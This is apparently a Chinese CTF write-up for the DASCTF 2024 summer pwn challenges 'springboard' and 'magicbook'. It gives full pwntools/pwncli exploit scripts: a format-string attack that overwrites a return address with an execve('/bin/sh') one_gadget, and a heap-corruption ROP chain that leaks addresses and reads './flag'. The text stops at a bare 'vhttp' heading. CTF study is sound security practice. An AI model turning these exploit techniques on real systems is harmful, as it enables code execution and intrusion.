DASCTF 2024暑期挑战赛

(没打,结束了才去看了题)

springboard

非栈上的格式化字符串

格式

%Yc%X$n

将Y写入栈上第X个位置指针指向的位置

0x50a47 posix_spawn(rsp+0x1c, "/bin/sh", 0, rbp, rsp+0x60, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
rbp == NULL || (u16)[rbp] == NULL

0xebc81 execve("/bin/sh", r10, [rbp-0x70])
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xebc85 execve("/bin/sh", r10, rdx)
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL
[rdx] == NULL || rdx == NULL

0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
address rbp-0x78 is writable
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL

利用栈上的两条链来改写rbp以及返回地址,使满足one_gadget的要求

(懒得patch)

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from LibcSearcher import *
from time import time

cli_script()  # pwncli script mode requires this explicit call

# pwncli populates `gift` with the objects the script works with
io = gift.io              # process or remote object
elf = gift.elf            # ELF object for the challenge binary
libc = gift.libc          # ELF object for libc.so.6
filename = gift.filename  # current filename
is_debug = gift.debug     # debug mode flag
is_remote = gift.remote   # remote mode flag
gdb_pid = gift.gdb_pid    # gdb pid when debugging

arch = 'amd64'
context(log_level='debug', os='linux', arch=arch)
if is_remote:
    # The libc shipped with the remote target may differ from the local one;
    # swap it in here when needed, e.g. libc = ELF("./rlibc.so.6")
    gift['libc'] = libc
libc_box = LibcBox()  # LibcBox object

# - - - - - - - - - - - - - #
onegadget = [0xebc85]  # libc offset of the execve("/bin/sh", r10, rdx) gadget listed above
bss = 0x601800         # writable address stored in the second stack slot (see pwn_exp)
# - - - - - - - - - - - - - #
def s_(c):
    """Send *c* (str or bytes) as the reply to the program's keyword prompt."""
    prompt = "Please enter a keyword"
    sla(prompt, c)
# - - - - - - - - - - - - - #
def pwn_exp():
    """Drive the three format-string stages over the keyword prompt.

    1. Leak a libc pointer and a stack pointer with ``%3$p,%13$p`` and
       rebase ``libc.address`` and the local ``stack`` from them.
    2. Point the slot-13 pointer at ``stack + 0x18`` and store the
       one_gadget address there through slots 45 and 43.
    3. Point it at ``stack + 0x10`` and store ``bss`` there the same way.

    Reads the module globals ``io``, ``libc``, ``onegadget`` and ``bss``.
    Returns nothing; the recovered addresses are logged at the end.
    """
    print('PWN')

    # -- stage 1: leaks ----------------------------------------------------
    s_(b'%3$p,%13$p')
    ru('0x')
    # The original literals (0x7fe8ea38b7e2 and 0x7fe8ea277000) are values
    # seen in one debug run; only their difference matters, so it is folded.
    libc.address = int(io.recv(12), 16) - 0x1147e2
    ru(',0x')
    # Likewise 0x7fff9b06e258 - 0x7fff9b06e130 == 0x128.
    stack = int(io.recv(12), 16) - 0x128

    def aim(offset):
        """Overwrite the low 16 bits of the slot-13 pointer with
        ``(stack + offset) & 0xffff``, then write through slot 31
        (the leading ``%c`` consumes one argument first)."""
        payload = f'%{(stack + offset) & 0xffff}c%13$hn'
        payload += '%c1%31$hn'
        s_(payload)

    def store(value):
        """Write ``value`` in two pieces: its bits 16-23 through slot 45
        (``hhn``) and its low 16 bits through slot 43 (``hn``).
        NOTE(review): the second width is ``low - mid`` and goes negative
        when ``low < mid`` -- the script assumes that never happens."""
        low = value & 0xffff
        mid = (value >> 16) & 0xff
        print(hex(mid), hex(low))
        payload = f'%{mid}c%45$hhn'
        payload += f'%{low - mid}c%43$hn'
        s_(payload)

    # -- stage 2: one_gadget into stack+0x18 -------------------------------
    aim(0x18)
    store(libc.address + onegadget[0])

    # -- stage 3: bss into stack+0x10 --------------------------------------
    aim(0x10)
    store(bss)

    log.info('#---#---#---#---#')
    log.success(f'libc.address:{hex(libc.address)}')
    log.success(f'stack:{hex(stack)}')

def main():
    """Run the exploit stages, then hand the session to the user."""
    pwn_exp()
    io.interactive()


if __name__ == '__main__':
    main()

magicbook

libc为2.35

#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from LibcSearcher import *
from time import time

cli_script()  # pwncli script mode requires this explicit call

# pwncli populates `gift` with the objects the script works with
io = gift.io              # process or remote object
elf = gift.elf            # ELF object for the challenge binary
libc = gift.libc          # ELF object for libc.so.6
filename = gift.filename  # current filename
is_debug = gift.debug     # debug mode flag
is_remote = gift.remote   # remote mode flag
gdb_pid = gift.gdb_pid    # gdb pid when debugging

arch = 'amd64'
context(log_level='debug', os='linux', arch=arch)
if is_remote:
    # The libc shipped with the remote target may differ from the local one;
    # swap it in here when needed, e.g. libc = ELF("./rlibc.so.6")
    gift['libc'] = libc
libc_box = LibcBox()  # LibcBox object

# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
def cmd(c):
    """Answer the menu prompt with choice *c* (any value, sent as str)."""
    choice = str(c)
    sla("Your choice:", choice)
def add(size):
    """Menu option 1: create a book with *size* pages."""
    cmd(1)
    pages = str(size)
    sla("How many pages does your book need?", pages)
def free(idx, choice=0, idx_=0, data=""):
    """Menu option 2: delete book *idx*.

    choice == 1 answers 'Y' to the "say anything else" prompt and then
    writes *data* into page *idx_*; choice == 0 answers 'N' and returns.
    Any other value answers 'N' but still proceeds to the page write
    (kept as in the original script).
    """
    cmd(2)
    sla("which book would you want to delete?", str(idx))
    answer = 'Y' if choice == 1 else 'N'
    sa("Do you want to say anything else before being deleted?(y/n)", answer)
    if choice == 0:
        return
    sla("which page do you want to write?", str(idx_))
    sa("content: ", data)

def edit(data):
    """Menu option 3: send *data* at the story prompt."""
    cmd(3)
    do(data)
def do(data):
    """Send *data* at the story prompt without selecting a menu option first."""
    prompt = "come on,Write down your story!"
    sa(prompt, data)
# - - - - - - - - - - - - - #
def pwn_exp():
    """Run the magicbook exploit end to end.

    Rebases ``elf.address`` from the printed gift pointer, sets up the
    heap with the add/free sequence below, then sends three payloads via
    ``edit``/``do``: one that leaks ``puts`` to recover ``libc.address``,
    one that leaks a heap pointer to recover ``heap_base``, and finally
    the ``orw_chain`` built by ``CG`` around a ``./flag`` string.

    Reads the module globals ``io``, ``elf``, ``libc`` and ``CG``.
    Returns nothing; recovered addresses are logged at the end.
    """
    print('PWN')
    ru('give you a gift: ')
    # 0x5642f87e1010 - 0x5642f87dd000 from the original debug run == 0x4010
    elf.address = int(io.recv(14), 16) - 0x4010

    # heap setup (book indices in the trailing comments)
    add(0x428)  # 0
    add(0x30)   # 1
    add(0x418)  # 2
    free(0)
    add(0x438)  # 3
    free(2, 1, 0, p64_ex(elf.address + 0x4050 - 0x20) * 3)
    add(0x438)  # 4

    def puts_then_reenter(arg):
        """0x20 bytes of padding, then ret / pop rdi / *arg* / puts@plt /
        edit_the_book. Gadgets are looked up at call time, so the current
        ``CG`` search area applies."""
        parts = [
            b'\x00' * 0x20,
            p64_ex(CG.ret()),
            p64_ex(CG.pop_rdi_ret()),
            p64_ex(arg),
            p64_ex(elf.plt.puts),
            p64_ex(elf.sym.edit_the_book),
        ]
        return b''.join(parts)

    # first payload: gadgets from the binary only, leak puts@got
    CG.set_find_area(find_in_elf=True, find_in_libc=False)
    edit(puts_then_reenter(elf.got.puts))
    libc.address = recv_libc_addr(io) - libc.sym.puts

    # second payload: libc gadgets now allowed, leak the pointer at elf+0x4088
    CG.set_find_area(find_in_elf=True, find_in_libc=True)
    do(puts_then_reenter(elf.address + 0x4088))
    ru('\n')
    # 0x557c29854fb0 - 0x557c29854000 from the original debug run == 0xfb0
    heap_base = u64_ex(io.recv(6)) - 0xfb0
    # originally written as heap_base + 0xfa0 + 0x10
    dest = heap_base + 0xfb0

    # third payload: "./flag" padded to 0x28, followed by the open/read/write chain
    flag_path = b'./flag'.ljust(0x28, b'\x00')
    do(flag_path + CG.orw_chain(dest, dest + 0x3000))

    log.info('#---#---#---#---#')
    log.success(f'libc.address: {hex(libc.address)}')
    log.success(f'elf.address: {hex(elf.address)}')
    log.success(f'heap_base: {hex(heap_base)}')
    log.success(f'dest: {hex(dest)}')

def main():
    """Run the exploit stages, then hand the session to the user."""
    pwn_exp()
    io.interactive()


if __name__ == '__main__':
    main()

vhttp